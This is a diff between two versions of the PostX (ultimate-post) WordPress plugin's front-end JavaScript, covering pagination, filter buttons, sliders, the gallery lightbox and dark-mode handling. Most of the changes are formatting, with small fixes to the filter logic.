 	$(document).on("click", ".ultp-prev-action, .ultp-next-action", function (e) {
 		e.preventDefault();
@@ -275,7 +277,7 @@
 		}
 		const ultpUniqueIds = sessionStorage.getItem("ultp_uniqueIds");
 		const ultpCurrentUniquePosts = JSON.stringify(
-			wrap.find(".ultp-current-unique-posts").data("current-unique-posts")
+			wrap.find(".ultp-current-unique-posts").data("current-unique-posts"),
 		);
 
 		// Adv Filter Integration
@@ -326,15 +328,15 @@
 					setSession(
 						"ultp_uniqueIds",
 						JSON.stringify(
-							wrap.find(".ultp-current-unique-posts").data("ultp-unique-ids")
-						)
+							wrap.find(".ultp-current-unique-posts").data("ultp-unique-ids"),
+						),
 					);
 					if ($(window).scrollTop() > wrap.offset().top) {
 						$([document.documentElement, document.body]).animate(
 							{
 								scrollTop: wrap.offset().top - 80,
 							},
-							100
+							100,
 						);
 					}
 				}
@@ -351,7 +353,7 @@
 			},
 			error: function (xhr) {
 				console.log(
-					"Error occured.please try again" + xhr.statusText + xhr.responseText
+					"Error occured.please try again" + xhr.statusText + xhr.responseText,
 				);
 				parents
 					.closest(".ultp-block-wrapper")
@@ -415,7 +417,7 @@
 
 		const ultpUniqueIds = sessionStorage.getItem("ultp_uniqueIds");
 		const ultpCurrentUniquePosts = JSON.stringify(
-			parents.find(".ultp-current-unique-posts").data("current-unique-posts")
+			parents.find(".ultp-current-unique-posts").data("current-unique-posts"),
 		);
 
 		// Adv Filter Integration
@@ -474,7 +476,7 @@
 						// Adv Pagination block loadmore fix for post modules
 						if (that.data("blockname").includes("post-module")) {
 							$(
-								'<div style="clear:left;width:100%;padding-block:15px;"></div>'
+								'<div style="clear:left;width:100%;padding-block:15px;"></div>',
 							).insertBefore(insertPoint);
 						}
 
@@ -485,8 +487,8 @@
 						if (that.data("blockname").includes("post-module")) {
 							cardDiv.append(
 								$(
-									'<div style="clear:left;width:100%;padding-block:15px;"></div>'
-								)
+									'<div style="clear:left;width:100%;padding-block:15px;"></div>',
+								),
 							);
 						}
 
@@ -496,8 +498,10 @@
 					setSession(
 						"ultp_uniqueIds",
 						JSON.stringify(
-							parents.find(".ultp-current-unique-posts").data("ultp-unique-ids")
-						)
+							parents
+								.find(".ultp-current-unique-posts")
+								.data("ultp-unique-ids"),
+						),
 					);
 				}
 			},
@@ -512,7 +516,7 @@
 
 			error: function (xhr) {
 				console.log(
-					"Error occured.please try again" + xhr.statusText + xhr.responseText
+					"Error occured.please try again" + xhr.statusText + xhr.responseText,
 				);
 				parents.removeClass("ultp-loading-active");
 
@@ -558,7 +562,7 @@
 
 			const ultpUniqueIds = sessionStorage.getItem("ultp_uniqueIds");
 			const ultpCurrentUniquePosts = JSON.stringify(
-				wrap.find(".ultp-current-unique-posts").data("current-unique-posts")
+				wrap.find(".ultp-current-unique-posts").data("current-unique-posts"),
 			);
 
 			if (parents.data("blockid")) {
@@ -642,8 +646,8 @@
 						setSession(
 							"ultp_uniqueIds",
 							JSON.stringify(
-								wrap.find(".ultp-current-unique-posts").data("ultp-unique-ids")
-							)
+								wrap.find(".ultp-current-unique-posts").data("ultp-unique-ids"),
+							),
 						);
 						handleDailyMotion();
 					},
@@ -651,7 +655,7 @@
 						console.log(
 							"Error occured.please try again" +
 								xhr.statusText +
-								xhr.responseText
+								xhr.responseText,
 						);
 						wrap.removeClass("ultp-loading-active");
 					},
@@ -706,8 +710,8 @@
 			pageNum <= 2
 				? [1, 2, 3]
 				: pages == pageNum
-				? [pages - 2, pages - 1, pages]
-				: [pageNum - 1, pageNum, pageNum + 1];
+					? [pages - 2, pages - 1, pages]
+					: [pageNum - 1, pageNum, pageNum + 1];
 		let i = 0;
 		parents.find(".ultp-center-item").each(function () {
 			if (pageNum == datas[i]) {
@@ -726,7 +730,7 @@
 		$(".ultp-current-unique-posts").each(function () {
 			setSession(
 				"ultp_uniqueIds",
-				JSON.stringify($(this).data("ultp-unique-ids"))
+				JSON.stringify($(this).data("ultp-unique-ids")),
 			);
 		});
 	}
@@ -755,7 +759,7 @@
 				},
 			},
 			document.title,
-			url
+			url,
 		);
 	}
 
@@ -829,7 +833,7 @@
 
 		const ultpUniqueIds = sessionStorage.getItem("ultp_uniqueIds");
 		const ultpCurrentUniquePosts = JSON.stringify(
-			wrap.find(".ultp-current-unique-posts").data("current-unique-posts")
+			wrap.find(".ultp-current-unique-posts").data("current-unique-posts"),
 		);
 
 		// Adv Filter Integration
@@ -881,15 +885,15 @@
 					setSession(
 						"ultp_uniqueIds",
 						JSON.stringify(
-							wrap.find(".ultp-current-unique-posts").data("ultp-unique-ids")
-						)
+							wrap.find(".ultp-current-unique-posts").data("ultp-unique-ids"),
+						),
 					);
 					if ($(window).scrollTop() > wrap.offset().top) {
 						$([document.documentElement, document.body]).animate(
 							{
 								scrollTop: wrap.offset().top - 80,
 							},
-							100
+							100,
 						);
 					}
 				},
@@ -899,7 +903,9 @@
 				},
 				error: function (xhr) {
 					console.log(
-						"Error occured.please try again" + xhr.statusText + xhr.responseText
+						"Error occured.please try again" +
+							xhr.statusText +
+							xhr.responseText,
 					);
 					wrap.removeClass("ultp-loading-active");
 				},
@@ -933,7 +939,7 @@
 
 	function slideshowDisplay() {
 		$(
-			".wp-block-ultimate-post-post-slider-1, .wp-block-ultimate-post-post-slider-2"
+			".wp-block-ultimate-post-post-slider-1, .wp-block-ultimate-post-post-slider-2",
 		).each(function () {
 			const sectionId = "#" + $(this).attr("id");
 			let selector = $(sectionId).find(".ultp-block-items-wrap");
@@ -988,7 +994,7 @@
 				if (selector.data("fade") && layTemp) {
 					settings.fade = selector.data("fade") ? true : false;
 				} else if (!selector.data("fade") && layTemp) {
-					(settings.slidesToShow = selector.data("slidelg") || 1),
+					((settings.slidesToShow = selector.data("slidelg") || 1),
 						(settings.responsive = [
 							{
 								breakpoint: 991,
@@ -1004,10 +1010,10 @@
 									slidesToScroll: 1,
 								},
 							},
-						]);
+						]));
 				} else {
-					(settings.slidesToShow = selector.data("slidelg") || 1),
-						(settings.centerMode = true);
+					((settings.slidesToShow = selector.data("slidelg") || 1),
+						(settings.centerMode = true));
 					settings.centerPadding = `${selector.data("paddlg")}px` || 100;
 					settings.responsive = [
 						{
@@ -1057,7 +1063,7 @@
 		let windowHeight = $(this).scrollTop();
 		$(".wp-block-ultimate-post-post-image").each(function () {
 			let contentSelector = $(this).find(
-				".ultp-builder-video video , .ultp-builder-video iframe"
+				".ultp-builder-video video , .ultp-builder-video iframe",
 			);
 			if ($(this).find(".ultp-video-block").hasClass("ultp-sticky-video")) {
 				// block height and position
@@ -1124,33 +1130,30 @@
 		const filterData = {};
 		const pagis = parent.data("pagi");
 
-		parent.find('.ultp-filter-button[data-is-active="true"]').each(function () {
+		parent.find(".ultp-filter-select").each(function () {
 			const type = $(this).attr("data-type");
 			const selected = $(this).attr("data-selected");
-			const cTax = $(this).attr("data-tax");
-
+			const cTax = $(this)
+				.find('.ultp-filter-select__dropdown-inner[data-id="' + selected + '"]')
+				.data("tax");
 			if (getTax(type) === "author") {
 				if (selected !== "_all") {
 					filterData.author = [{ value: selected }];
 				}
 				return;
 			}
-
 			if (getTax(type) === "order") {
 				filterData.order = selected;
 				return;
 			}
-
 			if (getTax(type) === "orderby") {
 				filterData.orderby = selected;
 				return;
 			}
-
 			if (getTax(type) === "adv_sort") {
 				filterData.adv_sort = selected;
 				return;
 			}
-
 			if (getTax(type) === "custom_tax") {
 				if (cTax) {
 					selectedFilters.push({
@@ -1159,18 +1162,15 @@
 				}
 				return;
 			}
-
 			selectedFilters.push({
 				value: getTax(type) + "###" + selected,
 			});
 		});
 
-		parent.find(".ultp-filter-select").each(function () {
+		parent.find('.ultp-filter-button[data-is-active="true"]').each(function () {
 			const type = $(this).attr("data-type");
 			const selected = $(this).attr("data-selected");
-			const cTax = $(this)
-				.find('.ultp-filter-select__dropdown-inner[data-id="' + selected + '"]')
-				.data("tax");
+			const cTax = $(this).attr("data-tax");
 
 			if (getTax(type) === "author") {
 				if (selected !== "_all") {
@@ -1202,7 +1202,6 @@
 				}
 				return;
 			}
-
 			selectedFilters.push({
 				value: getTax(type) + "###" + selected,
 			});
@@ -1217,7 +1216,7 @@
 
 		const ultpUniqueIds = sessionStorage.getItem("ultp_uniqueIds");
 		const ultpCurrentUniquePosts = JSON.stringify(
-			parent.find(".ultp-current-unique-posts").data("current-unique-posts")
+			parent.find(".ultp-current-unique-posts").data("current-unique-posts"),
 		);
 
 		let widgetBlockId = "";
@@ -1263,7 +1262,7 @@
 							.append(
 								'<div class="ultp-not-found-message" role="alert">' +
 									response?.data?.filteredData?.notFound +
-									"</div>"
+									"</div>",
 							);
 					}
 					grid
@@ -1323,13 +1322,15 @@
 					setSession(
 						"ultp_uniqueIds",
 						JSON.stringify(
-							parent.find(".ultp-current-unique-posts").data("ultp-unique-ids")
-						)
+							parent.find(".ultp-current-unique-posts").data("ultp-unique-ids"),
+						),
 					);
 				},
 				error: function (xhr) {
 					console.log(
-						"Error occured.please try again" + xhr.statusText + xhr.responseText
+						"Error occured.please try again" +
+							xhr.statusText +
+							xhr.responseText,
 					);
 					grid.removeClass("ultp-loading-active");
 				},
@@ -1390,10 +1391,10 @@
 				if (show) {
 					$(".ultp-filter-select .ultp-filter-select-options").css(
 						"display",
-						"none"
+						"none",
 					);
 					$(".ultp-filter-select .ultp-filter-select-field-icon").removeClass(
-						"ultp-dropdown-icon-rotate"
+						"ultp-dropdown-icon-rotate",
 					);
 					$(".ultp-filter-select").attr("aria-expanded", false);
 
@@ -1426,7 +1427,6 @@
 					const value = $(this).attr("data-id");
 					const filterId = $(this).attr("data-blockId");
 					const text = $(this).text();
-
 					$(this).on("click", function () {
 						selected.text(text);
 						filter.attr("data-selected", value);
@@ -1449,13 +1449,11 @@
 							copy
 								.find(".ultp-selected-filter-text")
 								.text(getFormattedSelectedFilter(type, text));
-
 							// Alignment
 							if (clearBtn.hasClass(firstElClass)) {
 								clearBtn.removeClass(firstElClass);
 								copy.addClass(firstElClass);
 							}
-
 							copy.find(".ultp-selected-filter-icon").on("click", function () {
 								resetFilter();
 								if (copy.hasClass(firstElClass)) {
@@ -1470,17 +1468,14 @@
 								copy.remove();
 								fetchPostsWithFilter();
 							});
-
 							copy.attr("data-id", value);
 							copy.attr("data-type", type);
 							copy.attr("data-for", filterId);
 							copy.css({
 								display: "block",
 							});
-
 							isNew && copy.insertBefore(clearBtn);
 						}
-
 						fetchPostsWithFilter();
 						showDropdown(true);
 					});
@@ -1499,7 +1494,7 @@
 						const currValue = $(this).text();
 						$(this).css(
 							"display",
-							currValue.toLowerCase().includes(value) ? "list-item" : "none"
+							currValue.toLowerCase().includes(value) ? "list-item" : "none",
 						);
 					});
 				} else {
@@ -1526,7 +1521,7 @@
 				// Clicking all button will disable other
 				if (value === "_all") {
 					const otherBtns = that.find(
-						'.ultp-filter-button[data-selected]:not([data-selected="_all"])'
+						'.ultp-filter-button[data-selected]:not([data-selected="_all"])',
 					);
 					if (otherBtns.length > 0) {
 						otherBtns.attr("data-is-active", "false");
@@ -1540,7 +1535,7 @@
 					!isActive
 				) {
 					const otherBtns = that.find(
-						`.ultp-filter-button[data-type="${fBtnType}"]`
+						`.ultp-filter-button[data-type="${fBtnType}"]`,
 					);
 					if (otherBtns.length > 0) {
 						otherBtns.attr("data-is-active", "false");
@@ -1563,6 +1558,15 @@
 				} else {
 					$(currFBtn).attr("data-is-active", "true");
 					$(currFBtn).addClass("ultp-filter-button-active");
+					if (
+						["author"].includes(fBtnType) ||
+						!($(this).parent().attr("data-multiselect") == "true")
+					) {
+						$(currFBtn)
+							.siblings()
+							.attr("data-is-active", "false")
+							.removeClass("ultp-filter-button-active");
+					}
 				}
 
 				fetchPostsWithFilter();
@@ -1624,7 +1628,7 @@
 
 			const currentParents = $(this).closest(".ultp-dl-after-before-con");
 			const opponent = parents.find(
-				`.ultp-${lightMode ? "dark" : "light"}-con`
+				`.ultp-${lightMode ? "dark" : "light"}-con`,
 			);
 			const opponentParents = opponent.closest(".ultp-dl-after-before-con");
 
@@ -1705,17 +1709,17 @@
 				// handle dark light image block
 				if (lightMode) {
 					$(".wp-block-ultimate-post-image .ultp-light-image-block").addClass(
-						"inactive"
+						"inactive",
 					);
 					$(".wp-block-ultimate-post-image .ultp-dark-image-block").removeClass(
-						"inactive"
+						"inactive",
 					);
 				} else if (!lightMode) {
 					$(".wp-block-ultimate-post-image .ultp-dark-image-block").addClass(
-						"inactive"
+						"inactive",
 					);
 					$(
-						".wp-block-ultimate-post-image .ultp-light-image-block"
+						".wp-block-ultimate-post-image .ultp-light-image-block",
 					).removeClass("inactive");
 				}
 
@@ -1730,14 +1734,14 @@
 				$(
 					`.ultp-dark-light-block-wrapper-content .ultp-${
 						lightMode ? "dark" : "light"
-					}-con`
+					}-con`,
 				).each(function () {
 					$(this).closest(".ultp-dl-after-before-con").removeClass("inactive");
 				});
 				$(
 					`.ultp-dark-light-block-wrapper-content .ultp-${
 						lightMode ? "light" : "dark"
-					}-con`
+					}-con`,
 				).each(function () {
 					$(this).closest(".ultp-dl-after-before-con").addClass("inactive");
 				});
@@ -1748,7 +1752,7 @@
 
 				handleDarkLight();
 			}, delay);
-		}
+		},
 	);
 
 	/**************     set cookie      **************/
@@ -1783,56 +1787,56 @@
 		) {
 			const root = $("#ultp-preset-colors-style-inline-css")[0].sheet;
 			const base1 = root.cssRules[0].style.getPropertyValue(
-				"--postx_preset_Base_1_color"
+				"--postx_preset_Base_1_color",
 			);
 			const base2 = root.cssRules[0].style.getPropertyValue(
-				"--postx_preset_Base_2_color"
+				"--postx_preset_Base_2_color",
 			);
 			const base3 = root.cssRules[0].style.getPropertyValue(
-				"--postx_preset_Base_3_color"
+				"--postx_preset_Base_3_color",
 			);
 
 			const contrast1 = root.cssRules[0].style.getPropertyValue(
-				"--postx_preset_Contrast_1_color"
+				"--postx_preset_Contrast_1_color",
 			);
 			const contrast2 = root.cssRules[0].style.getPropertyValue(
-				"--postx_preset_Contrast_2_color"
+				"--postx_preset_Contrast_2_color",
 			);
 			const contrast3 = root.cssRules[0].style.getPropertyValue(
-				"--postx_preset_Contrast_3_color"
+				"--postx_preset_Contrast_3_color",
 			);
 
 			root.cssRules[0].style.setProperty(
 				"--postx_preset_Base_1_color",
-				contrast1
+				contrast1,
 			);
 			root.cssRules[0].style.setProperty(
 				"--postx_preset_Base_2_color",
-				contrast2
+				contrast2,
 			);
 			root.cssRules[0].style.setProperty(
 				"--postx_preset_Base_3_color",
-				contrast3
+				contrast3,
 			);
 
 			root.cssRules[0].style.setProperty(
 				"--postx_preset_Contrast_1_color",
-				base1
+				base1,
 			);
 			root.cssRules[0].style.setProperty(
 				"--postx_preset_Contrast_2_color",
-				base2
+				base2,
 			);
 			root.cssRules[0].style.setProperty(
 				"--postx_preset_Contrast_3_color",
-				base3
+				base3,
 			);
 		}
 	}
 
 	function handleDailyMotion() {
 		$(
-			".ultp-video-modal .ultp-video-modal__content .ultp-video-wrapper > iframe"
+			".ultp-video-modal .ultp-video-modal__content .ultp-video-wrapper > iframe",
 		).each(function () {
 			const that = $(this);
 			const videoSrc = that.attr("src");
@@ -1843,7 +1847,7 @@
 			) {
 				that.attr(
 					"src",
-					videoSrc.slice(0, videoSrc.length - 1) + "?autoplay=0"
+					videoSrc.slice(0, videoSrc.length - 1) + "?autoplay=0",
 				);
 			}
 		});
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/ultp.min.js /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/ultp.min.js
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/ultp.min.js	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/ultp.min.js	2026-02-02 04:04:06.000000000 +0000
@@ -1 +1 @@
-!function(t){"use strict";t.fn.UltpSlider=function(e){let i=t.extend({},t.fn.UltpSlider.defaults,e),s=t(this),o=!0,l=0;if(s.wrap("<div class='acmeticker-wrap'></div>"),s.parent().css({position:"relative"}),s.children().first().addClass("active"),"horizontal"==i.type||"vertical"==i.type||"typewriter"==i.type){let e="";"typewriter"==i.type&&(e=setInterval((function(){a()}),i.speed));let l="";"horizontal"!=i.type&&"vertical"!=i.type||(l=setInterval((function(){a()}),i.speed)),t(i.controls.prev).on("click",(function(){"horizontal"!=i.type&&"vertical"!=i.type||(clearInterval(l),n("prev"),o&&(l=setInterval((function(){a()}),i.speed))),"typewriter"==i.type&&(clearInterval(e),n("prev"),o&&(e=setInterval((function(){a()}),i.speed)))})),t(i.controls.next).on("click",(function(){"horizontal"!=i.type&&"vertical"!=i.type||(clearInterval(l),n("next"),o&&(l=setInterval((function(){a()}),i.speed))),"typewriter"==i.type&&(clearInterval(e),n("next"),o&&(e=setInterval((function(){a()}),i.speed)))})),t(i.controls.toggle).on("click",(function(){"horizontal"!=i.type&&"vertical"!=i.type||(o?(o=!1,clearInterval(l)):(o=!0,clearInterval(l),l=setInterval((function(){a()}),i.speed))),"typewriter"==i.type&&(o?(o=!1,clearInterval(e)):(o=!0,clearInterval(e),e=setInterval((function(){a()}),i.speed)))})),i.pauseOnHover&&(s.on("mouseenter",(function(){"typewriter"===i.type&&clearInterval(e),"horizontal"!==i.type&&"vertical"!==i.type||clearInterval(l)})),s.on("mouseleave",(function(){"typewriter"===i.type&&o&&(e=setInterval((function(){a()}),i.speed)),"horizontal"!==i.type&&"vertical"!==i.type||!o||(l=setInterval((function(){a()}),i.speed))})))}if("marquee"==i.type){let e,n=i.speed,a=0,r=i.direction,d=s.outerWidth(),c=t(".ultp-newsTicker-wrap").outerWidth(),p=t(document).find("body").hasClass("rtl");"right"==r&&(e=c),"left"==r&&(e=s.outerWidth());let u=setInterval((function(){e<a&&"left"==r&&!p&&(a=-c),e<a&&"right"==r&&!p&&(a=-d),d<a&&"right"==r&&p&&(a=-c),c<a&&"left"==r&&p&&(a=-e),s.css(r,-a),a++}),n);t(i.controls.prev).on("click",(function(){o?(-s.outerWidth()>a&&"right"==r&&!p&&(a=e),a<-t(".ultp-newsTicker-wrap").outerWidth()&&"left"==r&&!p&&(a=e),-e>a&&"right"==r&&p&&(a=s.outerWidth()),-e>a&&"left"==r&&p&&(a=t(".ultp-newsTicker-wrap").outerWidth()),a-=250):(o=!0,u=setInterval((function(){e<a&&"left"==r&&!p&&(a=-c),-c>a&&"left"==r&&!p&&(a=e-100),e<a&&"right"==r&&!p&&(a=-d),d<a&&"right"==r&&p&&(a=-e),c<a&&"left"==r&&p&&(a=-e),s.css(r,-a),a++}),n))})),t(i.controls.prev).on("mousedown touchstart",(function(e){l=setInterval((function(){p||"right"!=r?p&&"left"==r?(a<-d&&(a=t(".ultp-newsTicker-wrap").outerWidth()-10),a-=30):p||"left"!=r?(a<-t(".ultp-newsTicker-wrap").outerWidth()&&p&&"right"==r&&(a=d),a-=30):(a<-t(".ultp-newsTicker-wrap").outerWidth()&&(a=d),a-=30):a>-d?a-=30:a=t(".ultp-newsTicker-wrap").outerWidth()-10}),100)})).bind("mouseup mouseleave touchend",(function(){clearInterval(l)})),t(i.controls.next).on("click",(function(){o?a+=250:(o=!0,u=setInterval((function(){e<a&&"left"==r&&!p&&(a=-c),e<a&&"right"==r&&!p&&(a=-d),c<a&&"left"==r&&p&&(a=-e),d<a&&"right"==r&&p&&(a=-e),s.css(r,-a),a++}),n))})),t(i.controls.next).on("mousedown touchstart",(function(t){l=setInterval((function(){a+=80}),80)})).bind("mouseup mouseleave touchend",(function(){clearInterval(l)})),t(i.controls.toggle).on("click",(function(){o?(o=!1,clearInterval(u)):(o=!0,u=setInterval((function(){e<a&&"left"==r&&!p&&(a=-c),t(".ultp-newsTicker-wrap").outerWidth()<a&&"left"==r&&p&&(a=-(d+100)),e<a&&"right"==r&&!p&&(a=-d),d<a&&"right"==r&&p&&(a=-t(".ultp-newsTicker-wrap").outerWidth()),s.css(r,-a),a++}),n))})),i.pauseOnHover&&(s.on("mouseenter",(function(){clearInterval(u)})),s.on("mouseleave",(function(){o&&(u=setInterval((function(){e<a&&"left"===r&&!p&&(a=-t(".ultp-newsTicker-wrap").outerWidth()),t(".ultp-newsTicker-wrap").outerWidth()<a&&"left"===r&&p&&(a=-e),t(".ultp-newsTicker-wrap").outerWidth()<a&&"right"===r&&!p&&(a=-d),d<a&&"right"===r&&p&&(a=-e),s.css(r,-a),a++}),n))})))}function n(t){let e=s.find(".active").index();e<0&&(e=0);let i=1;"prev"==t&&(s.children().eq(e).removeClass("active"),s.children().eq(e-i).addClass("active")),"next"==t&&(s.children().eq(e).removeClass("active"),e==s.children().length-1&&(i=-(s.children().length-1)),s.children().eq(e+i).addClass("active"))}function a(){let t=1,e=s.find(".active").index();e<0&&(e=0),s.children().eq(e).removeClass("active"),e==s.children().length-1&&(t=-(s.children().length-1)),s.children().eq(e+t).addClass("active")}},t.fn.UltpSlider.defaults={type:"horizontal",autoplay:2e3,speed:50,direction:"up",pauseOnFocus:!0,pauseOnHover:!0,controls:{prev:"",next:"",toggle:""}}}(jQuery),function(t){"use strict";const e=0==t(".wp-block-ultimate-post-gallery").length;t(".wp-block-ultimate-post-gallery").each((function(){const e=t(this);!function(e){const i=e.data("lightbox"),s=e.data("caption"),o=e.find(".ultp-gallery-item"),l=e.data("indicators"),n=e.find(".ultp-gallery-lightbox"),a=e.find(".ultp-gallery-loadMore"),r=e.find(".ultp-gallery-lightbox__zoom-in"),d=e.find(".ultp-gallery-lightbox__zoom-out"),c=e.find(".ultp-gallery-lightbox__close"),p=e.find(".ultp-gallery-lightbox__control"),u=e.find(".ultp-gallery-lightbox__full-screen"),h=e.find(".ultp-gallery-lightbox__indicator-control");let f=null,m=!0;t(document).on("click",(function(e){const i=t(e.target),s=t(".ultp-lightbox");i.closest(".ultp-gallery-lightbox__control, .ultp-lightbox__left-icon, .ultp-lightbox__right-icon, .ultp-lightbox__img-container, .ultp-lightbox-indicator__item-img").length>0||m||(s.hide(),p.hide(),m=!0),s.is(":visible")&&(m=!1)})),c.on("click",(function(){t(this).parent().parent(".ultp-gallery-wrapper").find(".ultp-lightbox").hide(),p.hide(),document.exitFullscreen?document.exitFullscreen().catch((t=>{console.error("Failed to exit fullscreen:",t)})):document.webkitExitFullscreen?document.webkitExitFullscreen():document.msExitFullscreen&&document.msExitFullscreen(),f=null}));let g=1;r.on("click",(function(){g+=.5;t(this).closest(".ultp-gallery-wrapper").find(".ultp-lightbox__inside img").css({transform:`scale(${g})`}),g>1?(t(".ultp-lightbox__caption").slideUp(300),t(".ultp-lightbox-indicator").slideUp(300)):t(".ultp-lightbox__caption").is(":visible")||t(".ultp-lightbox__caption").fadeIn(300)})),d.on("click",(function(){g-=.5;t(this).closest(".ultp-gallery-wrapper").find(".ultp-lightbox__inside img").css({transform:`scale(${g})`}),t(".ultp-lightbox__caption").is(":visible")||1!=g||t(".ultp-lightbox__caption").fadeIn(300),t(".ultp-lightbox-indicator").is(":visible")||1!=g||t(".ultp-lightbox-indicator").fadeIn(300)})),h.off("click").on("click",(function(e){e.stopPropagation();t(this).closest(".ultp-gallery-wrapper").find(".ultp-lightbox-indicator").slideToggle(300)})),u.on("click",(function(){const t=document.documentElement;document.fullscreenElement||document.webkitFullscreenElement||document.msFullscreenElement?document.exitFullscreen?document.exitFullscreen().catch((t=>{console.error("Failed to exit fullscreen:",t)})):document.webkitExitFullscreen?document.webkitExitFullscreen():document.msExitFullscreen&&document.msExitFullscreen():t.webkitRequestFullscreen?t.webkitRequestFullscreen():t.msRequestFullscreen&&t.msRequestFullscreen()})),i&&n.each((function(){t(this).off().on("click",(function(e){e.stopPropagation();const i=t(this);m=!1;const o=i.data("id"),n=i.data("index"),a=i.data("img"),r=i.closest(".ultp-gallery-item").data("caption"),d=i.parent().parent();w(i,o,n,a,r,d,s,l)}))})),t(document).on("click",".ultp-lightbox__right-icon, .ultp-lightbox__left-icon",(function(){const e=t(this),i=e.hasClass("ultp-lightbox__right-icon"),s=e.closest(".ultp-lightbox"),o=e.closest(".ultp-gallery-container"),l=s.find(".ultp-lightbox-indicator"),n=s.find(".ultp-lightbox__img"),a=s.find(".ultp-lightbox__caption"),r=o.children(),d=s.data("index");null==f&&(f=d),f=i?(f+1)%r.length:(f-1+r.length)%r.length;const c=r.eq(f),p=c.find(".ultp-gallery-media img").attr("src"),u=c.data("id"),h=c.data("caption");n.fadeOut(200,(function(){n.attr("src",p).fadeIn(200)})),a.fadeOut(200,(function(){a.text(h).fadeIn(200)}));const m=l.children().eq(f);m.addClass("lightbox-active").siblings().removeClass("lightbox-active"),m.data("id")!==u&&m.removeClass("lightbox-active")})),t(document).on("click",".ultp-lightbox-indicator__item",(function(){const e=t(this),i=e.find("img").attr("src"),s=e.closest(".ultp-lightbox").find(".ultp-lightbox__img");f=e.data("index"),s.fadeOut(200,(function(){s.attr("src",i).fadeIn(200)})),e.addClass("lightbox-active").siblings().removeClass("lightbox-active")})),i&&!(n.length>0)&&o.off().on("click",(function(e){const i=t(e.target).closest("svg").parent().is(".ultp-gallery-action a");if(!o.find(".ultp-lightbox").is(":visible")&&!i){const e=t(this);f=e.data("index");const i=e.data("id"),o=e.data("caption"),n=e.data("index"),a=e.find(".ultp-gallery-media img").attr("src"),r=e.find(".ultp-gallery-action-container");w(e,i,n,a,o,r,s,l)}}));const v=a[0]?Number(getComputedStyle(a[0]).getPropertyValue("--ultp-gallery-count").trim()):"";let b=v;a?.length>0&&o.each((function(e){v<e+1&&(t(this).find("img").attr({width:t(this).find("img").width(),height:t(this).find("img").height()}),t(this).css({display:"none"}))}));o.length<=b&&a.css({display:"none"});function w(e,i,s,l,n,a,r,d){p.css({display:"flex"}),t(".ultp-lightbox").remove();const c=o.map((function(e){const s=t(this).find("img").attr("src"),o=t(this).data("caption");return i==t(this).data("id")&&(f=e),console.log(s,"imgSrc"),`<div  data-index=${e} class="${i==t(this).data("id")?"ultp-lightbox-indicator__item lightbox-active":"ultp-lightbox-indicator__item"}" data-id=${t(this).data("id")} data-caption=${o}><img class="ultp-lightbox-indicator__item-img" src="${s}" /></div>`})).get().join(""),u=`<div class="ultp-lightbox" data-id=${i} data-index=${s}>\n                        <div class="ultp-lightbox__container">\n                            <div class="ultp-lightbox__inside">\n                                <div class="ultp-lightbox__left-icon"><svg  fill="currentColor"xmlns="http://www.w3.org/2000/svg" viewBox="0 0 49.16 37.25"><path  stroke-miterlimit="10" d="M18.157 36.154 2.183 20.179l-.053-.053-1.423-1.423 17.45-17.449a2.05 2.05 0 0 1 2.9 2.9l-12.503 12.5h38.053a2.05 2.05 0 1 1 0 4.1H8.555l12.5 12.5a2.05 2.05 0 1 1-2.9 2.9Z"></path></svg></div>\n                                <div class="ultp-lightbox__img-container">\n                                    <img class="ultp-lightbox__img" src="${l}" />\n                                    ${r?`<span class="ultp-lightbox__caption">${n}</span>`:""}\n                                </div>\n                                <div class="ultp-lightbox__right-icon"><svg fill="currentColor" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 49.16 37.25"><path  stroke-miterlimit="10" d="M28.1 36.154a2.048 2.048 0 0 1 0-2.9l12.5-12.5H2.55a2.05 2.05 0 1 1 0-4.1H40.6l-12.5-12.5a2.05 2.05 0 1 1 2.9-2.9l17.45 17.448L31 36.154a2.047 2.047 0 0 1-2.9 0Z"></path></svg></div>\n                            </div>\n                            ${d?`<div class="ultp-lightbox-indicator">${c}</div>`:""}\n                        </div>\n                    </div>`;a.append(u)}}(e),i(e)}));function i(e){const i=e;let s=i.find(".ultp-gallery-loader"),o=i.find(".ultp-no-gallery-message");const l=i.find(".ultp-gallery-container"),n=i.find(".ultp-gallery-filter__item"),a=i.find(".ultp-gallery-loadMore"),r=i.find(".ultp-gallery-container.ultp-gallery-tiled"),d=i.find(".ultp-gallery-container.ultp-gallery-masonry"),c=l[0]?Number(getComputedStyle(l[0]).getPropertyValue("--ultp-gallery-columns").trim()):3,p=l[0]?Number(getComputedStyle(l[0]).getPropertyValue("--ultp-gallery-gap").trim()):10,u=l.find(".ultp-gallery-item"),h=a[0]?Number(getComputedStyle(a[0]).getPropertyValue("--ultp-gallery-count").trim()):0;let f=h;if(0===s.length&&(d?.length||r?.length)&&(l.css({height:"250px",overflow:"hidden"}),s=t('<div class="ultp-gallery-loader" style="display:none;position:absolute;top:0;left:0;right:0;bottom:0;background:rgb(255 255 255 / 92%);z-index:9; display: flex; align-items:center;justify-content:center;">\n                    <div class="spinner" style="border: 4px solid #f3f3f3;border-top: 4px solid #037FFF;border-radius: 50%;width: 30px;height: 30px;animation: spin 0.8s linear infinite;"></div>\n                            </div>'),i.css("position","relative"),l.append(s)),!document.getElementById("ultp-spinner-style")){const y='<style id="ultp-spinner-style">\n                    @keyframes spin {\n                        0% { transform: rotate(0deg); }\n                        100% { transform: rotate(360deg); }\n                    }\n                </style>';t("head").append(y)}s.fadeIn(150),0===o.length&&(o=t('<div class="ultp-no-gallery-message">No gallery item found</div>'),l.after(o));let m=function(){};function g(){if(0===r.length)return;const e=r.find(".ultp-gallery-item:visible");r.css("visibility","hidden"),e.each((function(){t(this).css({top:"",left:"",width:"",height:"",position:""})})),requestAnimationFrame((()=>{m(e),r.css("visibility","visible")}))}function v(){if(0===d.length)return;const e=(d.width()-(c-1)*p)/c,i=d.find(".ultp-gallery-item:visible");let s=new Array(c).fill(0);i.each((function(){const i=t(this);i.css({width:e+"px",position:"absolute"});const o=s.indexOf(Math.min(...s)),l=s[o],n=o*(e+p);i.stop().animate({top:`${l}px`,left:`${n}px`},300),s[o]+=i.outerHeight(!0)+p})),d.css("height",Math.max(...s)+"px")}function b(e,i){let s=0,l=0;return u.each((function(){const 